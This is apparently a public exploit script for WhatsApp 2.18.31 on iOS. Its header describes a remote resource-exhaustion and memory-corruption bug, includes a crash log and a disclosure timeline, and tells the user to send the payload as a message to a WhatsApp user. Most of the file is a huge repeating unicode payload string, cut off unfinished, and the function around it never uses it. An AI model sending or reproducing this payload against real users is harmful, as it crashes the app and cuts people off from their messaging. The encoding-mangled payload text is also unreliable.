|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> at Exploit Pack
- http://www.exploitpack.com
# This vulnerability has been discovered and exploited using Exploit
Pack - Framework
#
# Tested on: iPhone 5/6s/X iOS 10 and 11.3 ( Latest release of iOS at
the date of writing this code )
#
# Description:
# WhatsApp 2.18.31 and prior are affected. The application fails to
properly filter user-supplied input and its prone to a remote memory
corruption.
#
# Impact:
# Resource exhaustion attacks exploit a design flaw. An attacker could
exploit this vulnerability to remotely corrupt the memory of the
application forcing an uhandled exception
# in the context of the application that could potentially result in a
denial-of-service condition and/or remote memory corruption.
#
# Debug:
# B04500954836","name":"WhatsApp"}
# Date/Time: 2018-04-06 18:15:30.608135 +0200
# OS Version: iPhone OS 11.2.6 (Build 15D100)
# Architecture: arm64
# Report Version: 19
# Command: WhatsApp
# Path:
/private/var/containers/Bundle/Application/2F86B692-D9A3-4BAC-B45E-6DCF62F47C2C/WhatsApp.app/WhatsApp
# Version: 2.18.31 (2.18.31.32)
# Beta Identifier: 4CA20191-C4A3-4920-ADEB-9ABAD10FCDF7
# Parent: launchd [1]
# PID: 28010
# Event: cpu usage
# CPU: 144s cpu time over 145 seconds (99% cpu average),
exceeding limit of 80% cpu over 180 seconds
# Action taken: Process killed
# Duration: 144.81s
# Steps: 48
# Hardware model: iPhone7,1
# Exception Type: EXC_CRASH (SIGKILL)
#
# How to use this exploit:
# Send the payload as a message to a whatsapp user, trough a phone or
whatsapp-web.
#
# Timeline:
# Date and time of release: 6 April 2018
# Triaged by Facebook: 25 April 2018
# Reported to Apple ( it's a bug on their side ): 01 May 2018
# Vendor homepage: http://www.whatsapp.com / http://www.facebook.com
import sys
reload(sys)
def whatsapp(filename):
sys.setdefaultencoding("utf-8")
payload = u'a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/ aC/!aC/C/aC/PSaC/$?aC/Y=aC/|aC/SSaC/"aC/(c)aC/aaC/<<aC/!aC/aC/(r)aC/-aC/degaC/+-aC/2aC/3aC/'aC/uaC/PaC/*aC/,aC/1aC/oaC/>>aC/1/4aC/1/2aC/3/4aC/?aPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPS aPS!aPSC/aPSPSaPS$?aPSY=aPS|aPSSSaPS"aPS(c)aPSaaPS<<aPS!aPSaPS(r)aPS-aPSdegaPS+-aPS2aPS3aPS'aPSuaPSPaPS*aPS,aPS1aPSoaPS>>aPS1/4aPS1/2aPS3/4aPS?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$? a$?!a$?C/a$?PSa$?$?a$?Y=a$?|a$?SSa$?"a$?(c)a$?aa$?<<a$?!a$?a$?(r)a$?-a$?dega$?+-a$?2a$?3a$?'a$?ua$?Pa$?*a$?,a$?1a$?oa$?>>a$?1/4a$?1/2a$?3/4a$??aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY= aY=!aY=C/aY=PSaY=$?aY=Y=aY=|aY=SSaY="aY=(c)aY=aaY=<<aY=!aY=aY=(r)aY=-aY=degaY=+-aY=2aY=3aY='aY=uaY=PaY=*aY=,aY=1aY=oaY=>>aY=1/4aY=1/2aY=3/4aY=?a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a| a|!a|C/a|PSa|$?a|Y=a||a|SSa|"a|(c)a|aa|<<a|!a|a|(r)a|-a|dega|+-a|2a|3a|'a|ua|Pa|*a|,a|1a|oa|>>a|1/4a|1/2a|3/4a|?aSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSS aSS!aSSC/aSSPSaSS$?aSSY=aSS|aSSSSaSS"aSS(c)aSSaaSS<<aSS!aSSaSS(r)aSS-aSSdegaSS+-aSS2aSS3aSS'aSSuaSSPaSS*aSS,aSS1aSSoaSS>>aSS1/4aSS1/2aSS3/4aSS?a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a" a"!a"C/a"PSa"$?a"Y=a"|a"SSa""a"(c)a"aa"<<a"!a"a"(r)a"-a"dega"+-a"2a"3a"'a"ua"Pa"*a",a"1a"oa">>a"1/4a"1/2a"3/4a"?a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c) a(c)!a(c)C/a(c)PSa(c)$?a(c)Y=a(c)|a(c)SSa(c)"a(c)(c)a(c)aa(c)<<a(c)!a(c)a(c)(r)a(c)-a(c)dega(c)+-a(c)2a(c)3a(c)'a(c)ua(c)Pa(c)*a(c),a(c)1a(c)oa(c)>>a(c)1/4a(c)1/2a(c)3/4a(c)?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aa!aaC/aaPSaa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3aPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-!a-a-(r)a--adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)adegaadeg<<adeg!adegadeg(r)adegdegadeg+-adeg2adeg3adeg'adeguadegPadeg*adeg,adeg1adegoadeg>>adeg1/4adeg1/2adeg3/4adeg?a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+- a+-!a+-C/a+-PSa+-$?a+-Y=a+-|a+-SSa+-"a+-(c)a+-aa+-<<a+-!a+-a+-(r)a+--a+-dega+-+-a+-2a+-3a+-'a+-ua+-Pa+-*a+-,a+-1a+-oa!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/ aC/!aC/C/aC/PSaC/$?aC/Y=aC/|aC/SSaC/"aC/(c)aC/aaC/<<aC/!aC/aC/(r)aC/-aC/degaC/+-aC/2aC/3aC/'aC/uaC/PaC/*aC/,aC/1aC/oaC/>>aC/1/4aC/1/2aC/3/4aC/?aPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPS aPS!aPSC/aPSPSaPS$?aPSY=aPS|aPSSSaPS"aPS(c)aPSaaPS<<aPS!aPSaPS(r)aPS-aPSdegaPS+-aPS2aPS3aPS'aPSuaPSPaPS*aPS,aPS1aPSoaPS>>aPS1/4aPS1/2aPS3/4aPS?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$? a$?!a$?C/a$?PSa$?$?a$?Y=a$?|a$?SSa$?"a$?(c)a$?aa$?<<a$?!a$?a$?(r)a$?-a$?dega$?+-a$?2a$?3a$?'a$?ua$?Pa$?*a$?,a$?1a$?oa$?>>a$?1/4a$?1/2a$?3/4a$??aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY= aY=!aY=C/aY=PSaY=$?aY=Y=aY=|aY=SSaY="aY=(c)aY=aaY=<<aY=!aY=aY=(r)aY=-aY=degaY=+-aY=2aY=3aY='aY=uaY=PaY=*aY=,aY=1aY=oaY=>>aY=1/4aY=1/2aY=3/4aY=?a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a| a|!a|C/a|PSa|$?a|Y=a||a|SSa|"a|(c)a|aa|<<a|!a|a|(r)a|-a|dega|+-a|2a|3a|'a|ua|Pa|*a|,a|1a|oa|>>a|1/4a|1/2a|3/4a|?aSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSS aSS!aSSC/aSSPSaSS$?aSSY=aSS|aSSSSaSS"aSS(c)aSSaaSS<<aSS!aSSaSS(r)aSS-aSSdegaSS+-aSS2aSS3aSS'aSSuaSSPaSS*aSS,aSS1aSSoaSS>>aSS1/4aSS1/2aSS3/4aSS?a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a" a"!a"C/a"PSa"$?a"Y=a"|a"SSa""a"(c)a"aa"<<a"!a"a"(r)a"-a"dega"+-a"2a"3a"'a"ua"Pa"*a",a"1a"oa">>a"1/4a"1/2a"3/4a"?a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c) a(c)!a(c)C/a(c)PSa(c)$?a(c)Y=a(c)|a(c)SSa(c)"a(c)(c)a(c)aa(c)<<a(c)!a(c)a(c)(r)a(c)-a(c)dega(c)+-a(c)2a(c)3a(c)'a(c)ua(c)Pa(c)*a(c),a(c)1a(c)oa(c)>>a(c)1/4a(c)1/2a(c)3/4a(c)?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aa!aaC/aaPSaa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3aPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-!a-a-(r)a--adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)adegaadeg<<adeg!adegadeg(r)adegdegadeg+-adeg2adeg3adeg'adeguadegPadeg*adeg,adeg1adegoadeg>>adeg1/4adeg1/2adeg3/4adeg?a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+- a+-!a+-C/a+-PSa+-$?a+-Y=a+-|a+-SSa+-"a+-(c)a+-aa+-<<a+-!a+-a+-(r)a+--a+-dega+-+-a+-2a+-3a+-'a+-ua+-Pa+-*a+-,a+-1a+-oa!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/ aC/!aC/C/aC/PSaC/$?aC/Y=aC/|aC/SSaC/"aC/(c)aC/aaC/<<aC/!aC/aC/(r)aC/-aC/degaC/+-aC/2aC/3aC/'aC/uaC/PaC/*aC/,aC/1aC/oaC/>>aC/1/4aC/1/2aC/3/4aC/?aPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPS aPS!aPSC/aPSPSaPS$?aPSY=aPS|aPSSSaPS"aPS(c)aPSaaPS<<aPS!aPSaPS(r)aPS-aPSdegaPS+-aPS2aPS3aPS'aPSuaPSPaPS*aPS,aPS1aPSoaPS>>aPS1/4aPS1/2aPS3/4aPS?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$? a$?!a$?C/a$?PSa$?$?a$?Y=a$?|a$?SSa$?"a$?(c)a$?aa$?<<a$?!a$?a$?(r)a$?-a$?dega$?+-a$?2a$?3a$?'a$?ua$?Pa$?*a$?,a$?1a$?oa$?>>a$?1/4a$?1/2a$?3/4a$??aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY= aY=!aY=C/aY=PSaY=$?aY=Y=aY=|aY=SSaY="aY=(c)aY=aaY=<<aY=!aY=aY=(r)aY=-aY=degaY=+-aY=2aY=3aY='aY=uaY=PaY=*aY=,aY=1aY=oaY=>>aY=1/4aY=1/2aY=3/4aY=?a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a| a|!a|C/a|PSa|$?a|Y=a||a|SSa|"a|(c)a|aa|<<a|!a|a|(r)a|-a|dega|+-a|2a|3a|'a|ua|Pa|*a|,a|1a|oa|>>a|1/4a|1/2a|3/4a|?aSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSS aSS!aSSC/aSSPSaSS$?aSSY=aSS|aSSSSaSS"aSS(c)aSSaaSS<<aSS!aSSaSS(r)aSS-aSSdegaSS+-aSS2aSS3aSS'aSSuaSSPaSS*aSS,aSS1aSSoaSS>>aSS1/4aSS1/2aSS3/4aSS?a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a" a"!a"C/a"PSa"$?a"Y=a"|a"SSa""a"(c)a"aa"<<a"!a"a"(r)a"-a"dega"+-a"2a"3a"'a"ua"Pa"*a",a"1a"oa">>a"1/4a"1/2a"3/4a"?a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c) a(c)!a(c)C/a(c)PSa(c)$?a(c)Y=a(c)|a(c)SSa(c)"a(c)(c)a(c)aa(c)<<a(c)!a(c)a(c)(r)a(c)-a(c)dega(c)+-a(c)2a(c)3a(c)'a(c)ua(c)Pa(c)*a(c),a(c)1a(c)oa(c)>>a(c)1/4a(c)1/2a(c)3/4a(c)?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aa!aaC/aaPSaa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3aPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-!a-a-(r)a--adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)adegaadeg<<adeg!adegadeg(r)adegdegadeg+-adeg2adeg3adeg'adeguadegPadeg*adeg,adeg1adegoadeg>>adeg1/4adeg1/2adeg3/4adeg?a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+- a+-!a+-C/a+-PSa+-$?a+-Y=a+-|a+-SSa+-"a+-(c)a+-aa+-<<a+-!a+-a+-(r)a+--a+-dega+-+-a+-2a+-3a+-'a+-ua+-Pa+-*a+-,a+-1a+-oa!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/aC/ aC/!aC/C/aC/PSaC/$?aC/Y=aC/|aC/SSaC/"aC/(c)aC/aaC/<<aC/!aC/aC/(r)aC/-aC/degaC/+-aC/2aC/3aC/'aC/uaC/PaC/*aC/,aC/1aC/oaC/>>aC/1/4aC/1/2aC/3/4aC/?aPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPS aPS!aPSC/aPSPSaPS$?aPSY=aPS|aPSSSaPS"aPS(c)aPSaaPS<<aPS!aPSaPS(r)aPS-aPSdegaPS+-aPS2aPS3aPS'aPSuaPSPaPS*aPS,aPS1aPSoaPS>>aPS1/4aPS1/2aPS3/4aPS?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$? a$?!a$?C/a$?PSa$?$?a$?Y=a$?|a$?SSa$?"a$?(c)a$?aa$?<<a$?!a$?a$?(r)a$?-a$?dega$?+-a$?2a$?3a$?'a$?ua$?Pa$?*a$?,a$?1a$?oa$?>>a$?1/4a$?1/2a$?3/4a$??aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY= aY=!aY=C/aY=PSaY=$?aY=Y=aY=|aY=SSaY="aY=(c)aY=aaY=<<aY=!aY=aY=(r)aY=-aY=degaY=+-aY=2aY=3aY='aY=uaY=PaY=*aY=,aY=1aY=oaY=>>aY=1/4aY=1/2aY=3/4aY=?a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a| a|!a|C/a|PSa|$?a|Y=a||a|SSa|"a|(c)a|aa|<<a|!a|a|(r)a|-a|dega|+-a|2a|3a|'a|ua|Pa|*a|,a|1a|oa|>>a|1/4a|1/2a|3/4a|?aSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSS aSS!aSSC/aSSPSaSS$?aSSY=aSS|aSSSSaSS"aSS(c)aSSaaSS<<aSS!aSSaSS(r)aSS-aSSdegaSS+-aSS2aSS3aSS'aSSuaSSPaSS*aSS,aSS1aSSoaSS>>aSS1/4aSS1/2aSS3/4aSS?a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a" a"!a"C/a"PSa"$?a"Y=a"|a"SSa""a"(c)a"aa"<<a"!a"a"(r)a"-a"dega"+-a"2a"3a"'a"ua"Pa"*a",a"1a"oa">>a"1/4a"1/2a"3/4a"?a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c) a(c)!a(c)C/a(c)PSa(c)$?a(c)Y=a(c)|a(c)SSa(c)"a(c)(c)a(c)aa(c)<<a(c)!a(c)a(c)(r)a(c)-a(c)dega(c)+-a(c)2a(c)3a(c)'a(c)ua(c)Pa(c)*a(c),a(c)1a(c)oa(c)>>a(c)1/4a(c)1/2a(c)3/4a(c)?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aa!aaC/aaPSaa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3aPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-!a-a-(r)a--adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)adegaadeg<<adeg!adegadeg(r)adegdegadeg+-adeg2adeg3adeg'adeguadegPadeg*adeg,adeg1adegoadeg>>adeg1/4adeg1/2adeg3/4adeg?a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+- a+-!a+-C/a+-PSa+-$?a+-Y=a+-|a+-SSa+-"a+-(c)a+-aa+-<<a+-!a+-a+-(r)a+--a+-dega+-+-a+-2a+-3a+-'a+-ua+-Pa+-*a+-,a+-1a+-oa!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! 